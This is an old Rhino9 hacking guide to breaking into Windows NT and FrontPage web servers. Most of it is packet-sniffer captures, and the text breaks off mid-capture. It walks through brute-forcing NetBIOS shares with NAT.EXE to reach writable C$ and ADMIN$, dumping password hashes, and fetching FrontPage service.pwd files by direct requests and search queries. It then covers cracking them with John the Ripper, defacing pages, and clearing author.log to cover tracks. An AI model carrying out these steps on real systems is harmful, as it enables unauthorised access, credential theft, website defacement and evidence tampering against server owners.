==========Windows NT Vulnerabilities Version 2================================== by Vacuum & Chame|eon of Rhino9 [www.rhino9.org] [http://www.technotronic.com -- vacuum@technotronic.com] March 11,1998 Nothing changed in this updated version other than a few minor spelling errors and irrelevant information removed. Enjoy. Frontpage (Hacking) Don't Let Others fool you chame|eon and I were the first to decrypt service.pwd files. NetBIOS Shares in depth. All mentioned programs available at www.technotronic.com ==========NetBIOS Attack Program================================== Verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1 NAT.EXE [-o filename] [-u userlist] [-p passlist] <address> OPTIONS -o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output. -u Specify the file to read usernames from. Usernames will be read from the specified file when attempt- ing to guess the password on the remote server. Usernames should appear one per line in the speci- fied file. -p Specify the file to read passwords from. Passwords will be read from the specified file when attempt- ing to guess the password on the remote server. Passwords should appear one per line in the speci- fied file. <address> Addresses should be specified in comma deliminated format, with no spaces. Valid address specifica- tions include: hostname - "hostname" is added 127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20. hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.1 All combinations of hostnames and address ranges as specified above are valid. Note that NAT.EXE will ip scan for netbios shares as performed above. Comparing NAT.EXE to Microsoft's own executables: C:\nbtstat -A 204.73.131.11 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D Here is a partial NetBIOS 16th bit listing: Computername <00> UNIQUE workstation service name <00> GROUP domain name Server <20> UNIQUE Server Service name Computername <03> UNIQUE Registered by the messenger service. This is the computername to be added to the LMHOSTS file which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood. Username <03> Registered by the messenger service. Domainname <1B> Registers the local computer as the master browser for the domain Domainname <1C> Registers the computer as a domain controller for the domain (PDC or BDC) Domainname <1D> Registers the local client as the local segments master browser for the domain Domainname <1E> Registers as a Group NetBIOS Name <BF> Network Monitor Name <BE> Network Monitor Agent <06> RAS Server <1F> Net DDE <21> RAS Client C:\net view 204.73.131.11 Shared resources at 204.73.131.11 Share name Type Used as Comment ------------------------------------------------------------------------------ NETLOGON Disk Logon server share Test Disk The command completed successfully. NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown. C:\net use /? The syntax of this command is: NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]] [/USER:[domainname\]username] [[/DELETE] | [/PERSISTENT:{YES | NO}]] NET USE [devicename | *] [password | *]] [/HOME] NET USE [/PERSISTENT:{YES | NO}] C:\net use x: \\204.73.131.11\test The command completed successfully. C:\unzipped\nat10bin>net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK X: \\204.73.131.11\test Microsoft Windows Network OK \\204.73.131.11\test Microsoft Windows Network The command completed successfully. C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30 [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: 204.73.131.11 [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Mon Dec 01 07:44:34 1997 [*]--- Timezone is UTC-6.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin C$ Disk: Default share IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share Test Disk: [*]--- This machine has a browse list: Server Comment --------- ------- STUDENT1 [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$ [*]--- Checking write access in: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ [*]--- Attempting to access share: \\*SMBSERVER\C$ [*]--- WARNING: Able to access share: \\*SMBSERVER\C$ [*]--- Checking write access in: \\*SMBSERVER\C$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$ [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON [*]--- Checking write access in: \\*SMBSERVER\NETLOGON [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON [*]--- Attempting to access share: \\*SMBSERVER\Test [*]--- WARNING: Able to access share: \\*SMBSERVER\Test [*]--- Checking write access in: \\*SMBSERVER\Test [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access If Default share of Everyone/Full Control. Done it is hacked. ==========Frontpage Extension Scanner & Cracker======================== NOTE: This is the pwdump from the webserver the Lan Manager password is set to "password". Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain:: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain:: STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253::: ketan:1005:********************************:********************************::: mari:1006:********************************:********************************::: meng:1007:********************************:********************************::: IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access:: The #haccess.ctl file: # -FrontPage- Options None <Limit GET POST PUT> order deny,allow deny from all </Limit> AuthName default_realm AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp Executing fpservwin.exe allows frontpage server extensions to be installed on port 443 (HTTPS)Secure Sockets Layer port 80 (HTTP) NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used instead of Frontpage. The following is a list of the Internet Information server files location in relation to the local hard drive (C:) and the web (www.target.com) C:\InetPub\wwwroot <Home> C:\InetPub\scripts /Scripts C:\InetPub\wwwroot\_vti_bin /_vti_bin C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut C:\InetPub\cgi-bin /cgi-bin C:\InetPub\wwwroot\srchadm /srchadm C:\WINNT\System32\inetserv\iisadmin /iisadmin C:\InetPub\wwwroot\_vti_pvt C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample C:\Program Files\Microsoft FrontPage\_vti_bin C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin NOTE: If Index Information Server running under Internet Information Server. service.pwd is our goal, although lots of servers are not password protected and can be exploited easily. queryhit.htm if found can be used to get service.pwd search for "#filename=*.pwd" Systems by default will have ftp service running. C:\InetPub\ftproot is the default location for the ftp service which by default runs on the standard port 21. Select the Allow Anonymous Connections check box to allow users using the username "anonymous" to log into your FTP server. Use the User Name and Password dialog boxes to establish the Windows NT user account to use for permissions for all anonymous connections. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within Windows NT ; anonymous users do not log on using this user name and password. Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions. When you installed Internet Information Server, Setup created the account IUSR_computername in the Windows NT User Manager for Domains and in Internet Service Manager. This account was assigned a random password for both in Internet Service Manager and in the Windows NT User Manager for Domains. If you change the password, you must change it in both places and make sure it matches. FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to: service.pwd contains the list of users and passwords for the FrontPage web. service.grp contains the list of groups (one group for authors and one for administrators in FrontPage). On Netscape servers, there are no service.grp files. The Netscape password files are: administrators.pwd for administrators authors.pwd for authors and administrators users.pwd for users, authors, and administrators NOTE: Name and password are case sensitive Scanning PORT 80 or 443 options: GET /_vti_inf.html #Ensures that frontpage server extensions are installed. GET /_vti_pvt/service.pwd #Contains the encrypted password files. Not used on IIS and WebSite servers GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted names and passwords of authors. GET /_vti_pvt/administrators.pwd GET /_vti_log/author.log #If author.log is there it will need to be cleaned to cover your tracks GET /samples/search/queryhit.htm Other ways of obtaining service.pwdhttp://ftpsearch.com/index.html search for service.pwdhttp://www.alstavista.digital.com advanced search for link:"/_vti_pvt/service.pwd" Attempt to connect to the server using FTP. port 21 login anonymous password guest@unknown the anonymous login will use the internally created IISUSR_computername account to assign NT permissions. An incorrect configuration may leave areas vulnerable to attack. If service.pwd is obtained it will look similar to this: Vacuum:SGXJVl6OJ9zkE The above password is apple Turn it into DES format: Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash The run your favorite unix password cracker like John The Ripper Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files] Flags: -pwfile:<file>[,..] specify passwd file(s) (wildcards allowed) -wordfile:<file> specify wordlist file -restore[:<file>] restore session [from <file>] -user:login|uid[,..] only crack this (these) user(s) -timeout:<time> abort session after a period of <time> minutes -incremental[:<mode>] incremental mode [using JOHN.INI entry <mode>] -single single crack mode -stdin read words from stdin -list list each word -test perform a benchmark -beep beep when a password is found -quiet do not beep when a password is found (default) -noname don't use memory for login names Other ways of obtaining service.pwd http://ftpsearch.com/index.html search for service.pwd http://www.alstavista.digital.com advanced search for link:"/_vti_pvt/service.pwd" To open a FrontPage web On the FrontPage Explorer’s File menu, choose Open FrontPage Web. In the Getting Started dialog box, select Open an Existing FrontPage Web and choose the FrontPage web you want to open. Click More Webs if the web you want to open is not listed. Click OK. If you are prompted for your author name and password, you will have to decrypt service.pwd, guess or move on. Enter them in the Name and Password Required dialog box, and click OK. Alter the existing page, or upload a page of your own. I have captured the entire hack from connection, to password authentication, to the actual page upload. To view this file, you will need to use Windows NT's Network monitor and open the file vac.cap =====Sniffing ============================================================== Running a packet sniffer to see the actual determining of shares: NOTE: R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..) This frame is a NetShareEnum request, which requests a list of shared resources. 19 31.348 STUDENT7 *SMBSERVER R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..) STUDENT7 *SMBSERVER IP FRAME: Base frame properties FRAME: Time of capture = Dec 3, 1997 9:12:54.18 FRAME: Time delta from previous physical frame: 0 milliseconds FRAME: Frame number: 19 FRAME: Total frame length: 238 bytes FRAME: Capture frame length: 238 bytes FRAME: Frame data: Number of data bytes remaining = 238 (0x00EE) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 00C04FC48C9D ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : 00C04FC48C93 ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 238 (0x00EE) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 224 (0x00E0) IP: ID = 0x1A08; Proto = TCP; Len: 224 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0) IP: Precedence = Routine IP: ...0.... = Normal Delay IP: ....0... = Normal Throughput IP: .....0.. = Normal Reliability IP: Total Length = 224 (0xE0) IP: Identification = 6664 (0x1A08) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80) IP: Protocol = TCP - Transmission Control IP: Checksum = 0x415E IP: Source Address = 204.73.131.19 IP: Destination Address = 204.73.131.11 IP: Data: Number of data bytes remaining = 204 (0x00CC) TCP: .AP..., len: 184, seq: 73409249-73409432, ack: 1505236, win: 8278, src: 1832 dst: 139 (NBT Session) TCP: Source Port = 0x0728 TCP: Destination Port = NETBIOS Session Service TCP: Sequence Number = 73409249 (0x46022E1) TCP: Acknowledgement Number = 1505236 (0x16F7D4) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8278 (0x2056) TCP: Checksum = 0x40ED TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 184 (0x00B8) NBT: SS: Session Message, Len: 180 NBT: Packet Type = Session Message NBT: Packet Flags = 0 (0x0) NBT: .......0 = Add 0 to Length NBT: Packet Length = 180 (0xB4) NBT: SS Data: Number of data bytes remaining = 180 (0x00B4) SMB: C transact TransactNmPipe, FID = 0x800 SMB: SMB Status = Error Success SMB: Error class = No Error SMB: Error code = No Error SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x00C0 UID = 0x0800 SMB: Tree ID (TID) = 2048 (0x800) SMB: Process ID (PID) = 31936 (0x7CC0) SMB: User ID (UID) = 2048 (0x800) SMB: Multiplex ID (MID) = 192 (0xC0) SMB: Flags Summary = 24 (0x18) SMB: .......0 = Lock & Read and Write & Unlock not supported SMB: ......0. = Send No Ack not supported SMB: ....1... = Using caseless pathnames SMB: ...1.... = Canonicalized pathnames SMB: ..0..... = No Opportunistic lock SMB: .0...... = No Change Notify SMB: 0....... = Client command SMB: flags2 Summary = 32771 (0x8003) SMB: ...............1 = Understands long filenames SMB: ..............1. = Understands extended attributes SMB: ...0............ = No DFS capabilities SMB: ..0............. = No paging of IO SMB: .0.............. = Using SMB status codes SMB: 1............... = Using UNICODE strings SMB: Command = R transact SMB: Word count = 16 SMB: Word parameters SMB: Total parm bytes = 0 SMB: Total data bytes = 96 SMB: Max parm bytes = 0 SMB: Max data bytes = 1024 SMB: Max setup words = 0 (0x0) SMB: Transact Flags Summary = 0 (0x0) SMB: ...............0 = Leave session intact SMB: ..............0. = Response required SMB: Transact timeout = 0 (0x0) SMB: Parameter bytes = 0 (0x0) SMB: Parameter offset = 84 (0x54) SMB: Data bytes = 96 (0x60) SMB: Data offset = 84 (0x54) SMB: Max setup words = 2 SMB: Setup words SMB: Pipe function = Transact named pipe (TransactNmPipe) SMB: File ID (FID) = 2048 (0x800) SMB: Byte count = 113 SMB: Byte parameters SMB: File name = \PIPE\ SMB: Transaction data SMB: Data: Number of data bytes remaining = 96 (0x0060) MSRPC: c/o RPC Request: call 0x1 opnum 0xF context 0x0 hint 0x48 MSRPC: Version = 5 (0x5) MSRPC: Version (Minor) = 0 (0x0) MSRPC: Packet Type = Request MSRPC: Flags 1 = 3 (0x3) MSRPC: .......1 = Reserved -or- First fragment (AES/DC) MSRPC: ......1. = Last fragment -or- Cancel pending MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC) MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC) MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC) MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC) MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC) MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC) MSRPC: Packed Data Representation MSRPC: Fragment Length = 96 (0x60) MSRPC: Authentication Length = 0 (0x0) MSRPC: Call Identifier = 1 (0x1) MSRPC: Bind Frame Number = 17 (0x11) MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188 MSRPC: Allocation Hint = 72 (0x48) MSRPC: Presentation Context Identifier = 0 (0x0) MSRPC: Operation Number (c/o Request prop. dg header prop) = 15 (0xF) MSRPC: Stub DataR_SRVSVC: RPC Client call srvsvc:NetrShareEnum(..) R_SRVSVC: SRVSVC_HANDLE ServerName = 204.73.131.11 R_SRVSVC: LPSHARE_ENUM_STRUCT InfoStruct {..} R_SRVSVC: DWORD Level = 1 (0x1) R_SRVSVC: _SHARE_ENUM_UNION ShareInfo {..} R_SRVSVC: Switch Value = 1 (0x1) R_SRVSVC: SHARE_INFO_1_CONTAINER *Level1 {..} R_SRVSVC: DWORD EntriesRead = 0 (0x0) R_SRVSVC: LPSHARE_INFO_1 Buffer = 0 (0x0) R_SRVSVC: DWORD PreferedMaximumLength = 4294967295 (0xFFFFFFFF) 00000: 00 C0 4F C4 8C 9D 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E. 00010: 00 E0 1A 08 40 00 80 06 41 5E CC 49 83 13 CC 49 ....@...A^.I...I 00020: 83 0B 07 28 00 8B 04 60 22 E1 00 16 F7 D4 50 18 ...(...`".....P. 00030: 20 56 40 ED 00 00 00 00 00 B4 FF 53 4D 42 25 00 V@........SMB%. 00040: 00 00 00 18 03 80 24 82 00 00 00 00 00 00 00 00 ......$......... 00050: 00 00 00 08 C0 7C 00 08 C0 00 10 00 00 60 00 00 .....|.......`.. 00060: 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 54 ...............T 00070: 00 60 00 54 00 02 00 26 00 00 08 71 00 00 5C 00 .`.T...&...q..\. 00080: 50 00 49 00 50 00 45 00 5C 00 00 00 00 2D 05 00 P.I.P.E.\....-.. 00090: 00 03 10 00 00 00 60 00 00 00 01 00 00 00 48 00 ......`.......H. 000A0: 00 00 00 00 0F 00 36 1C 14 00 0E 00 00 00 00 00 ......6......... 000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7. 000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1. 000D0: 00 00 01 00 00 00 01 00 00 00 A0 FB 12 00 00 00 ................ 000E0: 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 .............. This is the response to the above share request: 27 31.376 *SMBSERVER STUDENT7 R_SRVSVC RPC Server response srvsvc:NetrServerGetInfo(..) *SMBSERVER STUDENT7 IP FRAME: Base frame properties FRAME: Time of capture = Dec 3, 1997 9:12:54.46 FRAME: Time delta from previous physical frame: 7 milliseconds FRAME: Frame number: 27 FRAME: Total frame length: 230 bytes FRAME: Capture frame length: 230 bytes FRAME: Frame data: Number of data bytes remaining = 230 (0x00E6) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 00C04FC48C93 ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : 00C04FC48C9D ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 230 (0x00E6) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 216 (0x00D8) IP: ID = 0x3C0E; Proto = TCP; Len: 216 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0) IP: Precedence = Routine IP: ...0.... = Normal Delay IP: ....0... = Normal Throughput IP: .....0.. = Normal Reliability IP: Total Length = 216 (0xD8) IP: Identification = 15374 (0x3C0E) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80) IP: Protocol = TCP - Transmission Control IP: Checksum = 0x1F60 IP: Source Address = 204.73.131.11 IP: Destination Address = 204.73.131.19 IP: Data: Number of data bytes remaining = 196 (0x00C4) TCP: .AP..., len: 176, seq: 1506074-1506249, ack: 73409903, win: 7314, src: 139 (NBT Session) dst: 1832 TCP: Source Port = NETBIOS Session Service TCP: Destination Port = 0x0728 TCP: Sequence Number = 1506074 (0x16FB1A) TCP: Acknowledgement Number = 73409903 (0x460256F) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 7314 (0x1C92) TCP: Checksum = 0x7C1E TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 176 (0x00B0) NBT: SS: Session Message, Len: 172 NBT: Packet Type = Session Message NBT: Packet Flags = 0 (0x0) NBT: .......0 = Add 0 to Length NBT: Packet Length = 172 (0xAC) NBT: SS Data: Number of data bytes remaining = 172 (0x00AC) SMB: R transact TransactNmPipe (response to frame 26) SMB: SMB Status = Error Success SMB: Error class = No Error SMB: Error code = No Error SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x01C0 UID = 0x0800 SMB: Tree ID (TID) = 2048 (0x800) SMB: Process ID (PID) = 31936 (0x7CC0) SMB: User ID (UID) = 2048 (0x800) SMB: Multiplex ID (MID) = 448 (0x1C0) SMB: Flags Summary = 152 (0x98) SMB: .......0 = Lock & Read and Write & Unlock not supported SMB: ......0. = Send No Ack not supported SMB: ....1... = Using caseless pathnames SMB: ...1.... = Canonicalized pathnames SMB: ..0..... = No Opportunistic lock SMB: .0...... = No Change Notify SMB: 1....... = Server response SMB: flags2 Summary = 32771 (0x8003) SMB: ...............1 = Understands long filenames SMB: ..............1. = Understands extended attributes SMB: ...0............ = No DFS capabilities SMB: ..0............. = No paging of IO SMB: .0.............. = Using SMB status codes SMB: 1............... = Using UNICODE strings SMB: Command = R transact SMB: Word count = 10 SMB: Word parameters SMB: Total parm bytes = 0 SMB: Total data bytes = 116 SMB: Parameter bytes = 0 (0x0) SMB: Parameter offset = 56 (0x38) SMB: Parameter Displacement = 0 (0x0) SMB: Data bytes = 116 (0x74) SMB: Data offset = 56 (0x38) SMB: Data Displacement = 0 (0x0) SMB: Max setup words = 0 SMB: Byte count = 117 SMB: Byte parameters SMB: Pipe function = Transact named pipe (TransactNmPipe) SMB: Data: Number of data bytes remaining = 116 (0x0074) MSRPC: c/o RPC Response: call 0x1 context 0x0 hint 0x5C cancels 0x0 MSRPC: Version = 5 (0x5) MSRPC: Version (Minor) = 0 (0x0) MSRPC: Packet Type = Response MSRPC: Flags 1 = 3 (0x3) MSRPC: .......1 = Reserved -or- First fragment (AES/DC) MSRPC: ......1. = Last fragment -or- Cancel pending MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC) MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC) MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC) MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC) MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC) MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC) MSRPC: Packed Data Representation MSRPC: Fragment Length = 116 (0x74) MSRPC: Authentication Length = 0 (0x0) MSRPC: Call Identifier = 1 (0x1) MSRPC: Bind Frame Number = 25 (0x19) MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188 MSRPC: Allocation Hint = 92 (0x5C) MSRPC: Presentation Context Identifier = 0 (0x0) MSRPC: Cancel Count = 0 (0x0) MSRPC: Reserved = 0 (0x0) MSRPC: Stub DataR_SRVSVC: RPC Server response srvsvc:NetrServerGetInfo(..) R_SRVSVC: LPSERVER_INFO InfoStruct {..} R_SRVSVC: Switch Value = 101 (0x65) R_SRVSVC: LPSERVER_INFO_101 ServerInfo101 {..} R_SRVSVC: DWORD sv101_platform_id = 500 (0x1F4) R_SRVSVC: LPTSTR sv101_name = 1363784 (0x14CF48) R_SRVSVC: DWORD sv101_version_major = 4 (0x4) R_SRVSVC: DWORD sv101_version_minor = 0 (0x0) R_SRVSVC: DWORD sv101_type = 266251 (0x4100B) R_SRVSVC: LPTSTR sv101_comment = 1363812 (0x14CF64) R_SRVSVC: LPTSTR sv101_name = 204.73.131.11 R_SRVSVC: LPTSTR sv101_comment = R_SRVSVC: Return Value = 0 (0x0) 00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 9D 08 00 45 00 ..O.....O.....E. 00010: 00 D8 3C 0E 40 00 80 06 1F 60 CC 49 83 0B CC 49 ..<.@....`.I...I 00020: 83 13 00 8B 07 28 00 16 FB 1A 04 60 25 6F 50 18 .....(.....`%oP. 00030: 1C 92 7C 1E 00 00 00 00 00 AC FF 53 4D 42 25 00 ..|........SMB%. 00040: 00 00 00 98 03 80 24 82 00 00 00 00 00 00 00 00 ......$......... 00050: 00 00 00 08 C0 7C 00 08 C0 01 0A 00 00 74 00 00 .....|.......t.. 00060: 00 00 00 38 00 00 00 74 00 38 00 00 00 00 00 75 ...8...t.8.....u 00070: 00 48 05 00 02 03 10 00 00 00 74 00 00 00 01 00 .H........t..... 00080: 00 00 5C 00 00 00 00 00 00 00 65 00 00 00 30 CF ..\.......e...0. 00090: 14 00 F4 01 00 00 48 CF 14 00 04 00 00 00 00 00 ......H......... 000A0: 00 00 0B 10 04 00 64 CF 14 00 0E 00 00 00 00 00 ......d......... 000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7. 000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1. 000D0: 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 ................ 000E0: 16 00 00 00 00 00 ...... Frontpage Sniff: Below you notice the NTLM authentication process and that an application called X-vermeer-urlencoded is the utility that is encrypting our LM password. An option within IIS "Windows NT Challeng/Response" is turned on in the following example. 21 30.856 00C04FC48C8F STUDENT7 HTTP POST Request (from client using port 1140) 204.73.131.18 STUDENT7 IP FRAME: Base frame properties FRAME: Time of capture = Dec 1, 1997 17:56:55.389 FRAME: Time delta from previous physical frame: 2 milliseconds FRAME: Frame number: 21 FRAME: Total frame length: 433 bytes FRAME: Capture frame length: 433 bytes FRAME: Frame data: Number of data bytes remaining = 433 (0x01B1) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 00C04FC48C93 ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : 00C04FC48C8F ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 433 (0x01B1) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 419 (0x01A3) IP: ID = 0xB805; Proto = TCP; Len: 419 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0) IP: Precedence = Routine IP: ...0.... = Normal Delay IP: ....0... = Normal Throughput IP: .....0.. = Normal Reliability IP: Total Length = 419 (0x1A3) IP: Identification = 47109 (0xB805) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80) IP: Protocol = TCP - Transmission Control IP: Checksum = 0xA296 IP: Source Address = 204.73.131.18 IP: Destination Address = 204.73.131.19 IP: Data: Number of data bytes remaining = 399 (0x018F) TCP: .AP..., len: 379, seq: 705525-705903, ack: 4115388, win: 8760, src: 1140 dst: 80 TCP: Source Port = 0x0474 TCP: Destination Port = Hypertext Transfer Protocol TCP: Sequence Number = 705525 (0xAC3F5) TCP: Acknowledgement Number = 4115388 (0x3ECBBC) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8760 (0x2238) TCP: Checksum = 0xA8FF TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 379 (0x017B) HTTP: POST Request (from client using port 1140) HTTP: Request Method = POST HTTP: Uniform Resource Identifier = /_vti_bin/_vti_aut/author.dll HTTP: Protocol Version = HTTP/1.0 HTTP: Date = Mon, 01 Dec 1997 23:57:10 GMT HTTP: MIME-Version = 1.0 HTTP: User-Agent = MSFrontPage/3.0 HTTP: Host = 204.73.131.19 HTTP: Accept = auth/sicily HTTP: Content-Length = 62 HTTP: Content-Encoding = x-vermeer-1 HTTP: Content-Type = 